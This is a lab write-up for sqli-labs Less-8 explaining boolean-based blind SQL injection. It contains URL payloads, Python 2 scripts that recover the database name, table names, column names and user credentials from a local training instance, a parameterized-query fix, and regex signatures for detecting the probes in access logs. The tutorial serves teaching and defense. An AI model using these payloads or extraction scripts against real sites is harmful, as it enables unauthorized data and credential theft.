
sqli-labs Less-8

Less-8 GET - Blind - Boolean Based - Single Quotes

1. The original page (screenshot)

2. ?id=1 (screenshot)

3. ?id=1' (screenshot)

4. Trying boolean-based blind injection

The code has a SQL injection flaw, but the page neither echoes query results nor echoes error messages. We can still construct statements that test a guess about the database and then use whether the page shows its "true" or "false" state to tell whether the guess was right.

?id=1' and (length(database()))>0 --+

(screenshot)

?id=1' and (length(database()))<0 --+

(screenshot)

5. Determining the first character of the database name

?id=1'%20and%20(select%20ascii(substr(database(),1,1)))>100--+

Is the first character greater than 100? If so, the page shows the "correct" result; if not, it shows the "wrong" one.

The substr() function: substr(a,b,c) takes c characters of string a, starting at position b.
The ascii() function: ascii() converts a character into its ASCII value.

(screenshot)

Narrow the range: check whether it is greater than 120.

?id=1'%20and%20(select%20ascii(substr(database(),1,1)))>120--+

(screenshot)

Not greater than 120, so narrow the range again: check whether it is greater than 115.

?id=1'%20and%20(select%20ascii(substr(database(),1,1)))>115--+

(screenshot)

?id=1'%20and%20(select%20ascii(substr(database(),1,1)))>114--+

(screenshot)

?id=1'%20and%20(select%20ascii(substr(database(),1,1)))=115--+

(screenshot)

The first character of the database name is 115; looking it up in an ASCII table, that is the letter s.

Determine the remaining characters of the database name in the same way, one position at a time.
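The reason the page behaves as a true/false oracle is the way Less-8 splices the id parameter into the query text. The following is an added example, not code from sqli-labs: it rebuilds the same WHERE clause in two ways against an in-memory SQLite table that stands in for the lab's users table (the row is constructed, and sqlite_version() replaces MySQL's database(), which SQLite lacks), and shows that only the string-concatenated form yields a boolean oracle.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table: one row is enough for the oracle.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    return con

def page_shows_row_concat(con, id_param):
    # Vulnerable form, as in Less-8: the GET parameter is spliced into the SQL text,
    # so a quote in it closes the literal and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 0,1" % id_param
    return con.execute(sql).fetchone() is not None

def page_shows_row_param(con, id_param):
    # Hardened form: the value is bound as a parameter and only ever compared as data.
    sql = "SELECT username FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (id_param,)).fetchone() is not None

def has_boolean_oracle(lookup):
    # The tell-tale of a boolean-based blind injection point: a condition that is
    # always true and one that is always false produce different pages.
    # (sqlite_version() stands in for the page's database(), which SQLite lacks.)
    con = make_db()
    true_probe = "1' and length(sqlite_version())>0 -- "
    false_probe = "1' and length(sqlite_version())<0 -- "
    return lookup(con, true_probe) != lookup(con, false_probe)

if __name__ == "__main__":
    print("concat:", has_boolean_oracle(page_shows_row_concat))  # True
    print("param: ", has_boolean_oracle(page_shows_row_param))   # False
```

The same pair of probes is a cheap regression check for any endpoint: if the two answers ever differ, the parameter is being interpreted as SQL rather than data.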

6. Guessing table names one character at a time

?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101--+

(screenshot)

7. Guessing column names one character at a time

?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117--+

(screenshot)

Guessing one character at a time by hand is inefficient; a Python script can do it instead. (The scripts below are borrowed from another author and run under Python 2.7.)

8. Getting the database name and the user:

# -*- coding:utf8 -*-
# Python 2.7. One request per candidate character; a character is kept when the "true" page comes back.
import requests
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'  # change this URL to match your own setup
payload = " and%20left({d}(),{n})=%27{s}%27%20--%20k"
# The two could be merged into one string, but there is no need (I split them myself)
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']  # character set
str1 = "You are in..........."  # the blind probe succeeded if this string appears in the returned page
# Start comparing database()
database = ''
for i in range(1, 10):  # like a C for loop over 1..9; strictly, the length of database() should be determined first
    for ss in list1:  # iterate over the list, assigning each item to ss
        p = payload.format(d='database', n=i, s=database+ss)  # fill in {d}, {n}, {s} in the payload
        u = requests.get(url+p)  # fetch the page
        # print p
        if str1 in u.content:  # if str1 is in the page content
            database += ss
            print u"正在對比database第", i, u"個字元",
            print database
            break  # character found; move on to the next position
print u"對比成功,database為:", database
# Start comparing user(); user works the same way
user = ''
for i in range(1, 20):
    for ss in list1:
        p = payload.format(d='user', n=i, s=user+ss)
        u = requests.get(url+p)
        # print p
        if str1 in u.content:
            user += ss
            print u"正在對比user第", i, u"個字元",
            print user
            break
print u"對比成功,user為:", user
print u"database-->", database
print u"user-->", user
a = raw_input()  # keep the console window open until Enter is pressed

9. Getting the table names

# -*- coding:utf8 -*-
# Python 2.7. Recovers the first four table names of the current database, one ASCII code at a time.
import requests
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = 'and%20ascii(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \
          'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
# I changed substr to substring above; in MySQL substring and substr should be the same, but if it errors change it back to substr
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,
         72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,
         104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]  # candidate ASCII codes
str1 = "You are in..........."
tables = ['', '', '', '']  # one string per table (limit 0,1 ... limit 3,1)
for i in range(0, 4):  # table index, used in "limit {t},1"
    for j in range(1, 10):  # character position within the table name
        for s in list1:
            p = payload.format(t=i, w=j, A=s)
            u = requests.get(url+p)
            if str1 in u.content:
                tables[i] += chr(s)
                print u"正在對比第", i+1, u"個表,", u"第", j, u"個字元", tables[i]
                break  # character found; move on to the next position
for i in range(0, 4):
    print 'tables%d-->' % (i+1), tables[i]
a = raw_input()  # keep the console window open until Enter is pressed

10. Getting the column names

# -*- coding:utf8 -*-
# Python 2.7. Recovers the column names of security.users with left(...)='prefix' comparisons.
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
         'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
         'Z', '.']  # character set
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \
          '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'
# payload is just the second half of the URL and the key part of the blind injection; it could be merged into the url variable
column = ['', '', '']  # one string per column; the users table has three columns
str1 = 'You are in...........'
# The four variables above are the ones this blind injection depends on
for j in range(0, len(column)):  # column index, used in "limit {w},1"
    for i in range(1, 9):  # character position within the column name
        for l in list1:
            p = payload.format(w=j, n=i, c=column[j]+l)
            u = requests.get(url+p)
            if str1 in u.content:
                column[j] += l
                print u'正在對比第', j+1, u'個字段第', i, u'個字元', column[j]
                break  # character found; move on to the next position
for c in range(0, len(column)):
    print 'column', c+1, '-->', column[c]
a = raw_input()  # keep the console window open until Enter is pressed

11. Getting the usernames and passwords

# -*- coding:utf8 -*-
# Python 2.7. Recovers username and password for rows id=1..14 of the users table.
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
         'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
         'Z', '.']  # character set
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']  # one string per row, id 1..14
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(1, 15):  # row id
    for j in range(1, 11):  # character position
        for l in list1:
            p = payload.format(n=i, w=j, d=username[i-1]+l)
            u = requests.get(url+p)
            if str1 in u.content:
                username[i-1] += l
                print u'正在對比第', i, u'個記錄的username的第', j, u'個字元', username[i-1]
                break  # character found; move on to the next position
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
    for j in range(1, 11):
        for l in list1:
            p = payload2.format(n=i, w=j, d=password[i-1]+l)
            u = requests.get(url+p)
            if str1 in u.content:
                password[i-1] += l
                print u'正在對比第', i, u'個記錄的password的第', j, u'個字元', password[i-1]
                break
print 'id    username    password'
for i in range(1, 15):
    print i, '-', username[i-1], '-', password[i-1]
a = raw_input()  # keep the console window open until Enter is pressed

12. The sqlmap tool can also be used (screenshots)
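Whether done by hand, by the scripts above or by sqlmap, this technique leaves a very recognisable trail in the web server's access log: many requests from one client whose id parameter, once URL-decoded, contains ascii(substr(...)), length(database()), information_schema or left(...)='prefix' comparisons with a comment tail. The following added example (not part of the original post) shows a Python 3 detector that parses constructed access-log lines shaped like this page's payloads and counts probe-like requests per client; the log lines, IPs and regex signatures are all assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Common-log-format line: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Signatures of the probes shown on this page, matched after URL decoding.
PROBE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bascii\s*\(\s*subst",            # ascii(substr(...)) / ascii(substring(...))
    r"\blength\s*\(\s*database\s*\(",   # length(database())
    r"\binformation_schema\.",          # table/column enumeration
    r"\bleft\s*\(.*\)\s*=\s*'",         # left(x, n)='prefix' as used by the scripts
    r"'\s+and\s+.*--",                  # quote break, AND, comment tail
)]

def is_blind_probe(value):
    """True if a decoded parameter value matches any boolean-blind signature."""
    return any(p.search(value) for p in PROBE_PATTERNS)

def flag_probes(log_lines):
    """Return {client_ip: count of requests carrying a probe-like parameter}."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if any(is_blind_probe(v) for values in params.values() for v in values):
            hits[m["ip"]] += 1
    return dict(hits)

# Constructed sample log: two normal requests from one client, three probes
# shaped like this page's payloads from another.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-8/?id=2 HTTP/1.1" 200 815
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27%20and%20(length(database()))>0%20--+ HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-8/?id=1%27%20and%20(select%20ascii(substr(database(),1,1)))>100--+ HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-8/?id=1%27%20and%20left(database(),1)=%27s%27%20--%20k HTTP/1.1" 200 812
""".splitlines()

if __name__ == "__main__":
    print(flag_probes(SAMPLE_LOG))  # {'10.0.0.9': 3}
```

In practice the per-client count is evaluated over a time window and alerted on above a threshold, since a single matching request is easy to produce by accident while the hundreds sent by the scripts above are not.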